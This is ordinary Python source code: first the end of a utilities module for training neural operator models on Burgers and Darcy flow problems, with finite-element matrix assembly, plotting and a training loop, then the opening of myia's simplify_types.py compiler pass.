sparse_mx = sparse_mx.tocoo().astype(np.float32)
indices = torch.from_numpy(
np.vstack((sparse_mx.row, sparse_mx.col)).astype(np.int64))
values = torch.from_numpy(sparse_mx.data)
shape = torch.Size(sparse_mx.shape)
return torch.sparse.FloatTensor(indices, values, shape)
'''
n, m = M.shape
coo_ = M.tocoo()
ix = torch.LongTensor([coo_.row, coo_.col])
M_t = torch.sparse.FloatTensor(ix,
torch.from_numpy(M.data).float(),
[n, m])
return M_t
def pooling_2d(mat, kernel_size: tuple = (2, 2), method='mean', padding=False):
'''Non-overlapping pooling on 2D data (or 2D data stacked as 3D array).
mat: ndarray, input array to pool. (m, n) or (bsz, m, n)
kernel_size: tuple of 2, kernel size in (ky, kx).
method: str, 'max' for max-pooling,
'mean' for mean-pooling.
padding: bool, pad <mat> or not. If False, output has size
n//f, n being <mat> size, f being kernel size.
If True, output has size ceil(n/f); the padding is nan
and is ignored when computing the mean.
Return <result>: pooled matrix.
Modified from https://stackoverflow.com/a/49317610/622119
to handle the case of batch edge matrices
CC BY-SA 3.0
'''
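# Usage sketch (illustrative, not part of the original file):
#   pooling_2d(np.arange(24.).reshape(4, 6), kernel_size=(2, 2), method='mean')
# returns a (2, 3) array in which each entry is the mean of a 2x2 block.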
m, n = mat.shape[-2:]
ky, kx = kernel_size
def _ceil(x, y): return int(np.ceil(x/float(y)))
if padding:
ny = _ceil(m, ky)
nx = _ceil(n, kx)
size = mat.shape[:-2] + (ny*ky, nx*kx)
sy = (ny*ky - m)//2
sx = (nx*kx - n)//2
_sy = ny*ky - m - sy
_sx = nx*kx - n - sx
mat_pad = np.full(size, np.nan)
mat_pad[..., sy:-_sy, sx:-_sx] = mat
else:
ny = m//ky
nx = n//kx
mat_pad = mat[..., :ny*ky, :nx*kx]
new_shape = mat.shape[:-2] + (ny, ky, nx, kx)
if method == 'max':
result = np.nanmax(mat_pad.reshape(new_shape), axis=(-3, -1))
elif method == 'mean':
result = np.nanmean(mat_pad.reshape(new_shape), axis=(-3, -1))
else:
raise NotImplementedError("pooling method not implemented.")
return result
def quadpts(order=2):
'''
ported from <NAME>'s iFEM's quadpts
'''
if order == 1: # Order 1, nQuad 1
baryCoords = [1/3, 1/3, 1/3]
weight = 1
elif order == 2: # Order 2, nQuad 3
baryCoords = [[2/3, 1/6, 1/6],
[1/6, 2/3, 1/6],
[1/6, 1/6, 2/3]]
weight = [1/3, 1/3, 1/3]
elif order == 3: # Order 3, nQuad 4
baryCoords = [[1/3, 1/3, 1/3],
[0.6, 0.2, 0.2],
[0.2, 0.6, 0.2],
[0.2, 0.2, 0.6]]
weight = [-27/48, 25/48, 25/48, 25/48]
elif order == 4: # Order 4, nQuad 6
baryCoords = [[0.108103018168070, 0.445948490915965, 0.445948490915965],
[0.445948490915965, 0.108103018168070, 0.445948490915965],
[0.445948490915965, 0.445948490915965, 0.108103018168070],
[0.816847572980459, 0.091576213509771, 0.091576213509771],
[0.091576213509771, 0.816847572980459, 0.091576213509771],
[0.091576213509771, 0.091576213509771, 0.816847572980459], ]
weight = [0.223381589678011, 0.223381589678011, 0.223381589678011,
0.109951743655322, 0.109951743655322, 0.109951743655322]
return np.array(baryCoords), np.array(weight)
def get_distance_matrix(node, graph=False):
'''
Input:
- Node: nodal coords
- graph: bool, whether to return graph distance
Output:
- inverse distance matrices (linear and square)
(batch_size, N, N, 2)
'''
N = len(node)
idx = np.arange(N)
Ds = []
for i in range(len(idx)):
if graph:
d = np.abs(idx[i] - idx)
else:
d = np.abs(node[i] - node)
Ds.append(d)
Dss = []
if graph:
Ds = np.array(Ds) + 1
Ds = 1 / Ds
Ds = np.repeat(Ds, 1, axis=0)
for i in [1, 2]:
Dss.append(Ds ** i)
else:
Ds = np.array(Ds)
max_distance = Ds.max()
Ds /= (max_distance + 1e-8)
Dss.append(np.exp(-Ds))
Ds = 1 / (1+Ds)
Dss.append(Ds)
Ds = np.stack(Dss, axis=2)
return Ds
def get_laplacian_1d(node,
K=None,
weight=None, # weight for renormalization
normalize=True,
smoother=None):
'''
Construct the 1D Laplacian matrix on the domain defined by node.
with a variable mesh size.
Input:
- node: array-like, shape (N, ) One dimensional mesh; or a positive integer.
- normalize: apply D^{-1/2} A D^{-1/2} row and column scaling to the Laplacian
Output:
- A : scipy sparse matrix, shape (N, N)
Laplacian matrix.
Reference:
Code adapted to 1D from the 2D one in
<NAME>: iFEM: An innovative finite element method package in Matlab.
Technical report, University of California-Irvine, 2009
'''
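# Assembly note (added): for linear P1 elements the local stiffness matrix on
# an element of size h is (K/h) * [[1, -1], [-1, 1]]; the double loop below
# scatters exactly these entries into the global sparse matrix A.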
if isinstance(node, int):
node = np.linspace(0, 1, node)
N = node.shape[0]
h = node[1:] - node[:-1]
elem = np.c_[np.arange(N-1), np.arange(1, N)]
Dphi = np.c_[-1/h, 1/h]
if K is None:
K = 1
# stiffness matrix
A = csr_matrix((N, N))
for i in range(2):
for j in range(2):
# $A_{ij}|_{\tau} = \int_{\tau}K\nabla \phi_i\cdot \nabla \phi_j dxdy$
Aij = h*K*Dphi[:, i]*Dphi[:, j]
A += csr_matrix((Aij, (elem[:, i], elem[:, j])), shape=(N, N))
if weight is not None:
A += diags(weight)
if normalize:
D = diags(A.diagonal()**(-0.5))
A = (D.dot(A)).dot(D)
if smoother == 'jacobi':
I = identity(N)
A = I-(2/3)*A # jacobi
A = csr_matrix(A)
elif smoother == 'gs':
raise NotImplementedError("Gauss-seidel not implemented")
return A
def get_mass_1d(node, K=None, normalize=False):
'''
Construct the 1D Mass matrix on the domain defined by node.
with a variable mesh size.
Input:
- node: array-like, shape (N, ) One dimensional mesh.
- normalize: apply D^{-1/2} M D^{-1/2} row and column scaling to the mass matrix
Output:
- M : scipy sparse matrix, shape (N, N), mass matrix.
Reference:
Code adapted to 1D from the 2D one in
<NAME>: iFEM: An innovative finite element method package in Matlab.
Technical report, University of California-Irvine, 2009
'''
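# Assembly note (added): the local P1 mass matrix on an element of size h is
# K*h/6 * [[2, 1], [1, 2]], which is what Mij = h*K*((i == j)+1)/6 evaluates
# to below before being scattered into the global matrix M.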
if isinstance(node, int):
node = np.linspace(0, 1, node)
N = node.shape[0]
h = node[1:] - node[:-1]
elem = np.c_[np.arange(N-1), np.arange(1, N)]
if K is None:
K = 1
# mass matrix
M = csr_matrix((N, N))
for i in range(2):
for j in range(2):
# $M_{ij}|_{\tau} = \int_{\tau}K \phi_i \cdot \phi_j dx$ \
Mij = h*K*((i == j)+1)/6
M += csr_matrix((Mij, (elem[:, i], elem[:, j])), shape=(N, N))
if normalize:
D = diags(M.diagonal()**(-0.5))
M = (D.dot(M)).dot(D)
return M
def showmesh(node, elem, **kwargs):
triangulation = tri.Triangulation(node[:, 0], node[:, 1], elem)
markersize = 3000/len(node)
if kwargs.items():
h = plt.triplot(triangulation, 'b-h', **kwargs)
else:
h = plt.triplot(triangulation, 'b-h', linewidth=0.5,
alpha=0.5, markersize=markersize)
return h
def showsolution(node, elem, u, **kwargs):
'''
show 2D solution either of a scalar function or a vector field
on triangulations
'''
markersize = 3000/len(node)
if u.ndim == 1: # (N, )
uplot = ff.create_trisurf(x=node[:, 0], y=node[:, 1], z=u,
simplices=elem,
colormap="Viridis", # similar to matlab's default colormap
showbackground=True,
show_colorbar=False,
aspectratio=dict(x=1, y=1, z=1),
)
fig = go.Figure(data=uplot)
elif u.ndim == 2 and u.shape[1] == 2: # (N, 2)
if u.shape[0] == elem.shape[0]:
u /= (np.abs(u)).max()
node = node[elem].mean(axis=1)
uplot = ff.create_quiver(x=node[:, 0], y=node[:, 1],
u=u[:, 0], v=u[:, 1],
scale=.2,
arrow_scale=.5,
name='gradient of u',
line_width=1,
)
fig = go.Figure(data=uplot)
if 'template' not in kwargs.keys():
fig.update_layout(template='plotly_dark',
margin=dict(l=5, r=5, t=5, b=5),
**kwargs)
else:
fig.update_layout(margin=dict(l=5, r=5, t=5, b=5),
**kwargs)
fig.show()
def showsurf(x, y, z, **kwargs):
'''
show 2D solution either of a scalar function or a vector field
on a meshgrid
x, y, z: (M, N) matrix
'''
uplot = go.Surface(x=x, y=y, z=z,
colorscale='Viridis',
showscale=False),
fig = go.Figure(data=uplot)
if 'template' not in kwargs.keys():
fig.update_layout(template='plotly_dark',
margin=dict(l=5, r=5, t=5, b=5),
**kwargs)
else:
fig.update_layout(margin=dict(l=5, r=5, t=5, b=5),
**kwargs)
fig.show()
def showcontour(z, **kwargs):
'''
show 2D solution z of its contour
'''
uplot = go.Contour(z=z,
colorscale='RdYlBu',
line_smoothing=0.85,
line_width=0.1,
contours=dict(
coloring='heatmap',
# showlabels=True,
)
)
fig = go.Figure(data=uplot,
layout={'xaxis': {'title': 'x-label',
'visible': False,
'showticklabels': False},
'yaxis': {'title': 'y-label',
'visible': False,
'showticklabels': False}},)
fig.update_traces(showscale=False)
if 'template' not in kwargs.keys():
fig.update_layout(template='plotly_dark',
margin=dict(l=0, r=0, t=0, b=0),
**kwargs)
else:
fig.update_layout(margin=dict(l=0, r=0, t=0, b=0),
**kwargs)
fig.show()
return fig
def showresult(result=dict(), title=None, result_type='convergence',
u=None, uh=None, grid=None, elem=None):
rc('font', **{'family': 'serif', 'serif': ['Computer Modern']})
rc('text', usetex=True)
jtplot.style(theme='grade3', context='notebook', ticks=True, grid=False)
if result_type == 'convergence':
loss_train = result['loss_train']
loss_val = result['loss_val']
train_label = r"$\mathrm{Train}: {E}\left( \displaystyle\|u_f - u_h\|_{\alpha, h, 1} \right)$"
plt.semilogy(loss_train, label=train_label)
val_label = r'$\mathrm{Valid}: \|T_f - T_h\|_{-1, V_h}$'
plt.semilogy(loss_val, label=val_label)
plt.grid(True, which="both", ls="--")
plt.legend(fontsize='x-large')
if title == 'fourier':
title_str = r"$\mathrm{Fourier}\ \mathrm{transformer}$"
elif title == 'galerkin':
title_str = r"$\mathrm{Galerkin}\ \mathrm{transformer}$"
elif title == 'spectral':
title_str = r"$\mathrm{Fourier}\ \mathrm{neural}\ \mathrm{operator}$"
else:
title_str = r"$\mathrm{Loss}\ \mathrm{result}$"
plt.title(title_str, fontsize='xx-large')
elif result_type == 'solutions':
sample_len = len(u)
i = np.random.choice(sample_len)
u = u[i].cpu().numpy().reshape(-1)
uh = uh[i].cpu().numpy().reshape(-1)
showsolution(grid, elem, u, template='seaborn', width=600, height=500)
showsolution(grid, elem, uh, template='seaborn',
width=600, height=500,)
def get_model_name(model='burgers',
num_encoder_layers=4,
n_hidden=96,
attention_type='fourier',
layer_norm=True,
grid_size=512,
inverse_problem=False,
additional_str: str = '',
):
model_name = 'burgers_' if model == 'burgers' else 'darcy_'
if inverse_problem:
model_name += 'inv_'
model_name += str(grid_size)+'_'
if attention_type == 'fourier':
attn_str = f'{num_encoder_layers}ft_'
elif attention_type == 'galerkin':
attn_str = f'{num_encoder_layers}gt_'
elif attention_type == 'linear':
attn_str = f'{num_encoder_layers}lt_'
elif attention_type == 'softmax':
attn_str = f'{num_encoder_layers}st_'
else:
attn_str = f'{num_encoder_layers}att_'
model_name += attn_str
model_name += f'{n_hidden}d_'
ln_str = 'ln_' if layer_norm else 'qkv_'
model_name += ln_str
if additional_str:
model_name += additional_str
_suffix = str(date.today())
if model_name[-1] == '_':
result_name = model_name + _suffix + '.pkl'
model_name += _suffix + '.pt'
else:
result_name = model_name + '_' + _suffix + '.pkl'
model_name += '_' + _suffix + '.pt'
return model_name, result_name
def get_args_1d():
parser = argparse.ArgumentParser(description='Example 1: Burgers equation')
parser.add_argument('--subsample', type=int, default=4, metavar='subsample',
help='input sampling from 8192 (default: 4 i.e., 2048 grid)')
parser.add_argument('--batch-size', type=int, default=8, metavar='bsz',
help='input batch size for training (default: 8)')
parser.add_argument('--val-batch-size', type=int, default=4, metavar='bsz',
help='input batch size for validation (default: 4)')
parser.add_argument('--attention-type', type=str, default='fourier', metavar='attn_type',
help='input attention type for encoders (possible: fourier (alias integral, local), galerkin (alias global), softmax (official PyTorch implementation), linear (standard Q(K^TV) with softmax), default: fourier)')
parser.add_argument('--xavier-init', type=float, default=0.01, metavar='xavier_init',
help='input Xavier initialization strength for Q,K,V weights (default: 0.01)')
parser.add_argument('--diagonal-weight', type=float, default=0.01, metavar='diagonal weight',
help='input diagonal weight initialization strength for Q,K,V weights (default: 0.01)')
parser.add_argument('--ffn-dropout', type=float, default=0.0, metavar='ffn_dropout',
help='dropout for the FFN in attention (default: 0.0)')
parser.add_argument('--encoder-dropout', type=float, default=0.0, metavar='encoder_dropout',
help='dropout after the scaled dot-product in attention (default: 0.0)')
parser.add_argument('--decoder-dropout', type=float, default=0.0, metavar='decoder_dropout',
help='dropout for the decoder layers (default: 0.0)')
parser.add_argument('--layer-norm', action='store_true', default=False,
help='use the conventional layer normalization')
parser.add_argument('--epochs', type=int, default=100, metavar='N',
help='number of epochs to train (default: 100)')
parser.add_argument('--lr', type=float, default=0.001, metavar='LR',
help='max learning rate (default: 0.001)')
parser.add_argument('--gamma', type=float, default=0.1, metavar='regularizer',
help='strength of gradient regularizer (default: 0.1)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--show-batch', action='store_true', default=False,
help='show batch training result')
parser.add_argument('--seed', type=int, default=SEED, metavar='Seed',
help='random seed (default: 1127802)')
return parser.parse_args()
def get_args_2d(subsample_nodes=3,
subsample_attn=10,
gamma=0.5,
noise=0.0,
ffn_dropout=0.1,
encoder_dropout=0.05,
decoder_dropout=0.0,
dropout=0.0,
inverse=False,
**kwargs):
if inverse:
parser = argparse.ArgumentParser(
description='Example 3: inverse coefficient identification problem for Darcy interface flow')
else:
parser = argparse.ArgumentParser(
description='Example 2: Darcy interface flow')
n_grid = int(((421 - 1)/subsample_nodes) + 1)
n_grid_c = int(((421 - 1)/subsample_attn) + 1)
parser.add_argument('--subsample-nodes', type=int, default=subsample_nodes, metavar='subsample',
help=f'input fine grid sampling from 421x421 (default: {subsample_nodes} i.e., {n_grid}x{n_grid} grid)')
parser.add_argument('--subsample-attn', type=int, default=6, metavar='subsample_attn',
help=f'input coarse grid sampling from 421x421 (default: {subsample_attn} i.e., {n_grid_c}x{n_grid_c} grid)')
parser.add_argument('--batch-size', type=int, default=4, metavar='bsz',
help='input batch size for training (default: 4)')
parser.add_argument('--val-batch-size', type=int, default=4, metavar='bsz',
help='input batch size for validation (default: 4)')
parser.add_argument('--attention-type', type=str, default='galerkin', metavar='attn_type',
help='input attention type for encoders (possible: fourier (alias integral, local), galerkin (alias global), softmax (official PyTorch implementation), linear (standard Q(K^TV) with softmax), default: galerkin)')
parser.add_argument('--noise', type=float, default=noise, metavar='noise',
help=f'strength of noise imposed (default: {noise})')
parser.add_argument('--xavier-init', type=float, default=1e-2, metavar='xavier_init',
help='input Xavier initialization strength for Q,K,V weights (default: 0.01)')
parser.add_argument('--diagonal-weight', type=float, default=1e-2, metavar='diagonal weight',
help='input diagonal weight initialization strength for Q,K,V weights (default: 0.01)')
parser.add_argument('--ffn-dropout', type=float, default=ffn_dropout, metavar='ffn_dropout',
help=f'dropout for the FFN in attention (default: {ffn_dropout})')
parser.add_argument('--encoder-dropout', type=float, default=encoder_dropout, metavar='encoder_dropout',
help=f'dropout after the scaled dot-product in attention (default: {encoder_dropout})')
parser.add_argument('--dropout', type=float, default=dropout, metavar='dropout',
help=f'dropout before the decoder layers (default: {dropout})')
parser.add_argument('--decoder-dropout', type=float, default=decoder_dropout, metavar='decoder_dropout',
help=f'dropout in the decoder layers (default: {decoder_dropout})')
parser.add_argument('--layer-norm', action='store_true', default=False,
help='use the conventional layer normalization')
parser.add_argument('--epochs', type=int, default=100, metavar='N',
help='number of epochs to train (default: 100)')
parser.add_argument('--lr', type=float, default=1e-3, metavar='LR',
help='max learning rate (default: 0.001)')
parser.add_argument('--gamma', type=float, default=gamma, metavar='regularizer',
help=f'strength of gradient regularizer (default: {gamma})')
parser.add_argument('--no-scale-factor', action='store_true', default=False,
help='use size instead of scale factor in interpolation')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--show-batch', action='store_true', default=False,
help='show batch training result')
parser.add_argument('--seed', type=int, default=SEED, metavar='Seed',
help='random seed (default: 1127802)')
return parser.parse_args()
def train_batch_burgers(model, loss_func, data, optimizer, lr_scheduler, device, grad_clip=0.999):
optimizer.zero_grad()
x, edge = data["node"].to(device), data["edge"].to(device)
pos, grid = data['pos'].to(device), data['grid'].to(device)
out_ = model(x, edge, pos, grid)
if isinstance(out_, dict):
out = out_['preds']
y_latent = out_['preds_latent']
elif isinstance(out_, tuple):
out = out_[0]
y_latent = None
target = data["target"].to(device)
u, up = target[..., 0], target[..., 1]
if out.size(2) == 2:
u_pred, up_pred = out[..., 0], out[..., 1]
loss, reg, ortho, _ = loss_func(
u_pred, u, up_pred, up, preds_latent=y_latent)
elif out.size(2) == 1:
u_pred = out[..., 0]
loss, reg, ortho, _ = loss_func(
u_pred, u, targets_prime=up, preds_latent=y_latent)
loss = loss + reg + ortho
loss.backward()
nn.utils.clip_grad_norm_(model.parameters(), grad_clip)
optimizer.step()
if lr_scheduler:
lr_scheduler.step()
try:
up_pred = out[..., 1]
except:
up_pred = u_pred
return (loss.item(), reg.item(), ortho.item()), u_pred, up_pred
def validate_epoch_burgers(model, metric_func, valid_loader, device):
model.eval()
metric_val = []
for _, data in enumerate(valid_loader):
with torch.no_grad():
x, edge = data["node"].to(device), data["edge"].to(device)
pos, grid = data['pos'].to(device), data['grid'].to(device)
out_ = model(x, edge, pos, grid)
if isinstance(out_, dict):
u_pred = out_['preds'][..., 0]
elif isinstance(out_, tuple):
u_pred = out_[0][..., 0]
target = data["target"].to(device)
u = target[..., 0]
_, _, _, metric = metric_func(u_pred, u)
try:
metric_val.append(metric.item())
except:
metric_val.append(metric)
return dict(metric=np.mean(metric_val, axis=0))
def train_batch_darcy(model, loss_func, data, optimizer, lr_scheduler, device, grad_clip=0.99):
optimizer.zero_grad()
a, x, edge = data["coeff"].to(device), data["node"].to(
device), data["edge"].to(device)
pos, grid = data['pos'].to(device), data['grid'].to(device)
u, gradu = data["target"].to(device), data["target_grad"].to(device)
# pos is for attention, grid is the finest grid
out_ = model(x, edge, pos=pos, grid=grid)
if isinstance(out_, dict):
out = out_['preds']
elif isinstance(out_, tuple):
out = out_[0]
if out.ndim == 4:
u_pred, pred_grad, target = out[..., 0], out[..., 1:], u[..., 0]
loss, reg, _, _ = loss_func(u_pred, target, pred_grad, gradu, K=a)
elif out.ndim == 3:
u_pred, u = out[..., 0], u[..., 0]
loss, reg, _, _ = loss_func(u_pred, u, targets_prime=gradu, K=a)
loss = loss + reg
loss.backward()
nn.utils.clip_grad_norm_(model.parameters(), grad_clip)
optimizer.step()
if lr_scheduler:
lr_scheduler.step()
try:
up_pred = out[..., 1:]
except:
up_pred = u_pred
return (loss.item(), reg.item()), u_pred, up_pred
def validate_epoch_darcy(model, metric_func, valid_loader, device):
model.eval()
metric_val = []
for _, data in enumerate(valid_loader):
with torch.no_grad():
x, edge = data["node"].to(device), data["edge"].to(device)
pos, grid = data['pos'].to(device), data['grid'].to(device)
out_ = model(x, edge, pos=pos, grid=grid)
if isinstance(out_, dict):
out = out_['preds']
elif isinstance(out_, tuple):
out = out_[0]
u_pred = out[..., 0]
target = data["target"].to(device)
u = target[..., 0]
_, _, metric, _ = metric_func(u_pred, u)
try:
metric_val.append(metric.item())
except:
metric_val.append(metric)
return dict(metric=np.mean(metric_val, axis=0))
def run_train(model, loss_func, metric_func,
train_loader, valid_loader,
optimizer, lr_scheduler,
train_batch=None,
validate_epoch=None,
epochs=10,
device="cuda",
mode='min',
tqdm_mode='batch',
patience=10,
grad_clip=0.999,
start_epoch: int = 0,
model_save_path=MODEL_PATH,
save_mode='state_dict', # 'state_dict' or 'entire'
model_name='model.pt',
result_name='result.pt'):
loss_train = []
loss_val = []
loss_epoch = []
lr_history = []
it = 0
if patience is None or patience == 0:
patience = epochs
start_epoch = start_epoch
end_epoch = start_epoch + epochs
best_val_metric = -np.inf if mode == 'max' else np.inf
best_val_epoch = None
save_mode = 'state_dict' if save_mode is None else save_mode
stop_counter = 0
is_epoch_scheduler = any(s in str(lr_scheduler.__class__)
for s in EPOCH_SCHEDULERS)
tqdm_epoch = False if tqdm_mode == 'batch' else True
with tqdm(total=end_epoch-start_epoch, disable=not tqdm_epoch) as pbar_ep:
for epoch in range(start_epoch, end_epoch):
model.train()
with tqdm(total=len(train_loader), disable=tqdm_epoch) as pbar_batch:
for batch in train_loader:
if is_epoch_scheduler:
loss, _, _ = train_batch(model, loss_func,
batch, optimizer,
None, device, grad_clip=grad_clip)
else:
loss, _, _ = train_batch(model, loss_func,
batch, optimizer,
lr_scheduler, device, grad_clip=grad_clip)
loss = np.array(loss)
loss_epoch.append(loss)
it += 1
lr = optimizer.param_groups[0]['lr']
lr_history.append(lr)
desc = f"epoch: [{epoch+1}/{end_epoch}]"
if loss.ndim == 0: # 1 target loss
_loss_mean = np.mean(loss_epoch)
desc += f" loss: {_loss_mean:.3e}"
else:
_loss_mean = np.mean(loss_epoch, axis=0)
for j in range(len(_loss_mean)):
if _loss_mean[j] > 0:
desc += f" | loss {j}: {_loss_mean[j]:.3e}"
desc += f" | current lr: {lr:.3e}"
pbar_batch.set_description(desc)
pbar_batch.update()
loss_train.append(_loss_mean)
# loss_train.append(loss_epoch)
loss_epoch = []
val_result = validate_epoch(
model, metric_func, valid_loader, device)
loss_val.append(val_result["metric"])
val_metric = val_result["metric"].sum()
if mode == 'max':
if val_metric > best_val_metric:
best_val_epoch = epoch
best_val_metric = val_metric
stop_counter = 0
else:
stop_counter += 1
else:
if val_metric < best_val_metric:
best_val_epoch = epoch
best_val_metric = val_metric
stop_counter = 0
if save_mode == 'state_dict':
torch.save(model.state_dict(), os.path.join(
model_save_path, model_name))
else:
torch.save(model, os.path.join(
model_save_path, model_name))
best_model_state_dict = {
k: v.to('cpu') for k, v in model.state_dict().items()}
best_model_state_dict = OrderedDict(best_model_state_dict)
else:
stop_counter += 1
if lr_scheduler and is_epoch_scheduler:
if 'ReduceLROnPlateau' in str(lr_scheduler.__class__):
lr_scheduler.step(val_metric)
else:
lr_scheduler.step()
if stop_counter > patience:
print(f"Early stop at epoch {epoch}")
break
if val_result["metric"].ndim == 0:
desc = color(
f"| val metric: {val_metric:.3e} ", color=Colors.blue)
else:
metric_0, metric_1 = val_result["metric"][0], val_result["metric"][1]
desc = color(
f"| val metric 1: {metric_0:.3e} ", color=Colors.blue)
desc += color(f"| val metric 2: {metric_1:.3e} ",
color=Colors.blue)
desc += color(
f"| best val: {best_val_metric:.3e} at epoch {best_val_epoch+1}", color=Colors.yellow)
desc += color(f" | early stop: {stop_counter} ", color=Colors.red)
desc += color(f" | current lr: {lr:.3e}", color=Colors.magenta)
if not tqdm_epoch:
tqdm.write("\n"+desc+"\n")
else:
desc_ep = color("", color=Colors.green)
if _loss_mean.ndim == 0: # 1 target loss
desc_ep += color(f"| loss: {_loss_mean:.3e} ",
color=Colors.green)
else:
for j in range(len(_loss_mean)):
if _loss_mean[j] > 0:
desc_ep += color(
f"| loss {j}: {_loss_mean[j]:.3e} ", color=Colors.green)
desc_ep += desc
pbar_ep.set_description(desc_ep)
pbar_ep.update()
result = dict(
best_val_epoch=best_val_epoch,
best_val_metric=best_val_metric,
loss_train=np.asarray(loss_train),
loss_val=np.asarray(loss_val),
lr_history=np.asarray(lr_history),
# best_model=best_model_state_dict,
optimizer_state=optimizer.state_dict()
)
save_pickle(result, os.path.join(model_save_path, result_name))
return result
class ProfileResult:
def __init__(self, result_file,
num_iters=1,
cuda=True) -> None:
'''
Hard-coded result computation based on torch.autograd.profiler
text printout, only works PyTorch 1.8.1
'''
self.columns = ['Name', 'Self CPU %', 'Self CPU',
'CPU total %', 'CPU total', 'CPU time avg',
'Self CUDA', 'Self CUDA %', 'CUDA total', 'CUDA time avg',
'CPU Mem', 'Self CPU Mem', 'CUDA Mem', 'Self CUDA Mem',
'# of Calls']
self.df = pd.read_csv(result_file,
delim_whitespace=True,
skiprows=range(5),
header=None)
self.num_iters = num_iters
self.cuda = cuda
self._clean_df()
def _clean_df(self):
df = self.df
if self.cuda:
df.loc[:, 16] = df.loc[:, 16].astype(str) + df.loc[:, 17]
df.loc[:, 14] = df.loc[:, 14].astype(str) + df.loc[:, 15]
df.loc[:, 12] = df.loc[:, 12].astype(str) + df.loc[:, 13]
df.loc[:, 10] = df.loc[:, 10].astype(str) + df.loc[:, 11]
df = df.drop(columns=[11, 13, 15, 17]
) if self.cuda else df.drop(columns=[11, 13])
self.cpu_time_total = df.iloc[-2, 4]
if self.cuda:
self.cuda_time_total = df.iloc[-1, 4]
df = df[:-3].copy()
df.columns = self.columns
self.df = df
def compute_total_mem(self, col_names):
total_mems = []
for col_name in col_names:
total_mem = 0
col_vals = self.df[col_name].values
for val in col_vals:
if val[-2:] == 'Gb':
total_mem += self.get_str_val(val[:-2])
elif val[-2:] == 'Mb':
total_mem += self.get_str_val(val[:-2])/1e3
total_mems.append(round(total_mem, 2))
return total_mems
def compute_total_time(self, col_names):
total_times = []
for col_name in col_names:
total_time = 0
col_vals = self.df[col_name].values
for val in col_vals:
if val[-2:] == 'ms':
total_time += float(val[:-2])
elif val[-2:] == 'us':
total_time += float(val[:-2])/1e3
total_times.append(round(total_time, 2))
return total_times
def print_total_mem(self, col_names):
total_mems = self.compute_total_mem(col_names)
for i, col_name in enumerate(col_names):
print(f"{col_name} total: {total_mems[i]} GB")
def print_total(self, col_names):
total_times = self.compute_total_time(col_names)
for i, col_name in enumerate(col_names):
print(f"{col_name} total: {total_times[i]} ms")
def print_total_time(self):
print(f"# of backprop iters: {self.num_iters}")
print(f"CPU time total: {self.cpu_time_total}")
if self.cuda:
print(f"CUDA time total: {self.cuda_time_total}")
@staticmethod
def get_str_val(string):
if string[0] == '-':
return -float(string[1:])
else:
return float(string)
if __name__ == '__main__':
get_seed(42)
``` |
{
"source": "Jimmy-INL/myia",
"score": 2
} |
#### File: myia/myia/simplify_types.py
```python
import weakref
from itertools import count
from ovld import ovld
from . import xtype
from .abstract import (
ANYTHING,
TYPE,
VALUE,
AbstractArray,
AbstractClassBase,
AbstractDict,
AbstractError,
AbstractExternal,
AbstractFunctionBase,
AbstractHandle,
AbstractKeywordArgument,
AbstractRandomState,
AbstractScalar,
AbstractTaggedUnion,
AbstractTuple,
AbstractType,
AbstractUnion,
AbstractValue,
abstract_clone,
empty,
from_value,
split_type,
type_to_abstract,
typecheck,
)
from .classes import Cons, Empty
from .compile import BackendValue
from .ir import Constant
from .operations import primitives as P
from .utils import HandleInstance, MyiaInputTypeError, TaggedValue
from .utils.misc import RandomStateWrapper
from .xtype import Int, NDArray, String
####################
# Tags and symbols #
####################
_idx = count()
_tagmap = weakref.WeakKeyDictionary()
def type_to_tag(t):
"""Return the numeric tag associated to the given type."""
if t not in _tagmap:
_tagmap[t] = next(_idx)
return _tagmap[t]
_tagmap_str = {}
_strmap_tag = {}
def str_to_tag(t):
"""Return the numeric tag associated to the given type."""
if t not in _tagmap_str:
s = len(_tagmap_str)
_tagmap_str[t] = s
_strmap_tag[s] = t
return _tagmap_str[t]
#########
# Reabs #
#########
@abstract_clone.variant
def _reabs(self, a: AbstractClassBase):
return (yield AbstractTuple)(self(x) for x in a.attributes.values())
@ovld # noqa: F811
def _reabs(self, a: AbstractScalar):
new_values = self(a.values)
if a.xtype() == String:
v = a.xvalue()
if v is not ANYTHING:
v = str_to_tag(v)
return AbstractScalar({**new_values, VALUE: v, TYPE: Int[64]})
else:
return AbstractScalar(new_values)
@ovld # noqa: F811
def _reabs(self, a: AbstractDict):
return (yield AbstractTuple)(self(x) for x in a.entries.values())
@ovld # noqa: F811
def _reabs(self, a: AbstractArray):
return (yield AbstractArray)(
self(a.element), {**self(a.values), TYPE: NDArray}
)
@ovld # noqa: F811
def _reabs(self, a: AbstractUnion):
return (yield AbstractTaggedUnion)(
[type_to_tag(opt), self(opt)] for opt in a.options
)
@ovld # noqa: F811
def _reabs(self, a: AbstractKeywordArgument):
return self(a.argument)
##################
# Simplify types #
##################
def simplify_types(root, manager):
r"""Simplify the set of types that can be found in the graph.
* Replace AbstractClass by AbstractTuple:
* Class[x: t, ...] => Tuple[t, ...]
* record_getitem(data, attr) => tuple_getitem(data, idx)
* record_setitem(data, attr, value) => tuple_setitem(data, idx, value)
* make_record(cls, \*args) => make_tuple(\*args)
* Replace AbstractDict by AbstractTuple:
* Dict[x: t, ...] => Tuple[t, ...]
* dict_getitem(data, item) => tuple_getitem(data, idx)
* dict_setitem(data, item, value) => tuple_setitem(data, idx, value)
* make_dict(cls, \*args) => make_tuple(\*args)
* Replace AbstractUnion by AbstractTaggedUnion:
* Union[a, b, c, ...] => TaggedUnion[1 => a, 2 => b, 3 => c, ...]
* hastype(x, type) => hastag(x, tag)
=> bool_or(hastag(x, tag1), hastag(x, tag2), ...)
* unsafe_static_cast(x, type) => casttag(x, tag)
"""
manager.add_graph(root)
for node in list(manager.all_nodes):
new_node = None
keep_abstract = True
def _mkct(idx):
idx_c = Constant(idx)
idx_c.abstract = AbstractScalar({VALUE: idx, TYPE: Int[64]})
return idx_c
def _record_makeindex(dt, attr):
assert isinstance(dt, AbstractClassBase)
idx = list(dt.attributes.keys()).index(attr)
return _mkct(idx)
def _dict_makeindex(dt, attr):
assert isinstance(dt, AbstractDict)
idx = list(dt.entries.keys()).index(attr)
return _mkct(idx)
if node.is_apply(P.record_getitem):
_, data, item = node.inputs
idx_c = _record_makeindex(data.abstract, item.value)
new_node = node.graph.apply(P.tuple_getitem, data, idx_c)
elif node.is_apply(P.dict_getitem):
_, data, item = node.inputs
idx_c = _dict_makeindex(data.abstract, item.value)
